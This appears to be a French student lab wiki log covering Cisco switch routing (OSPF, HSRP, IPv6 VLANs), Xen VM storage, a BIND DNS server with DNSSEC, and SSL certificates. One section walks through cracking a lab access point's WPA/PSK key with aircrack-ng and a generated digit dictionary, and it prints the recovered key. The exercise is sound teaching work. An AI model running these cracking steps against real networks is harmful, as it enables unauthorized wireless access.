 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
